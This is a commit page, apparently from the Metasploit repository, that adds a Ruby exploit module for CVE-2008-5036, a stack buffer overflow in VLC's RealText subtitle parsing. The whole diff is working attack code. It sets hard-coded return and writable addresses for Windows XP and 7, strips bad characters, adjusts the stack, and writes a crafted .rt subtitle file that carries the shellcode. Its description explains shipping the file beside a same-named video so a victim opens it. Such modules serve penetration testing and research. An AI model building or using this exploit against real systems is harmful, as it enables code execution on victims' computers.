Added exploit module for CVE-2008-5036

rapid7 · Mar 1, 2012 · f1a6d8f · f1a6d8f
1 parent 5a5e5ea
commit f1a6d8f
Showing 1 changed file with 100 additions and 0 deletions.
diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb
@@ -0,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VLC Media Player RealText Subtitle Overflow',
+			'Description'    => %q{
+					This module exploits a stack buffer overflow vulnerability in
+				VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of
+				RealText subtitle files.
+
+				This module generates a specially crafted RealText subtitle file.
+				VLC handles subtitles automatically. It just checks the presence
+				of a subtitle file with the same name of the loaded video. If such
+				a subtitle file is found, VLC loads and parses the file.
+
+				So to exploit the vulnerability the .rt file should be distributed
+				with a video file (.avi as sample) with the same file name. The
+				victim my open the video with the vulnerable VLC Media Player.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Tobias Klein',  # Vulnerability Discovery
+					'SkD', # Exploit
+					'juan vazquez' # Metasploit Module
+				],
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'OSVDB', '49809' ],
+					[ 'CVE', '2008-5036' ],
+					[ 'BID', '32125' ],
+					[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],
+					[ 'URL', 'http://www.videolan.org/security/sa0810.html' ]
+				],
+			'Payload'        =>
+				{
+					'Space'		=> 1900,
+					'DisableNops'	=> true,
+					'BadChars' => "\x00\x22\x0a",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1',
+						{
+							'Ret' => 0x68f0cfad, # jmp esp # libqt4_plugin.dll
+							'WritableAddress' => 0x695d5890 # libqt4_plugin.dll .data
+						}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Nov 05 2008',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.rt']),
+			], self.class)
+	end
+
+	def exploit
+
+		my_payload = ""
+		my_payload << Rex::Text.rand_text(72, payload_badchars)
+		my_payload << [target.ret].pack("V") # EIP => jmp esp
+		my_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+8").encode_string # ESP => jmp after "Writable address"
+		my_payload << Rex::Text.rand_text(2, payload_badchars)
+		my_payload << [target['WritableAddress']].pack("V") # Writable address
+		my_payload << payload.encoded
+
+		rt_file = <<-eos
+<window height="250" width="300" duration="15" bgcolor="yellow">
+Mary had a little lamb,
+<br/><time begin="#{my_payload}"/>
+<br/><time begin="6"/>little lamb,
+<br/><time begin="9"/>Mary had a little lamb
+<br/><time begin="12"/>whose fleece was white as snow.
+</window>
+		eos
+
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+		file_create(rt_file)
+
+	end
+end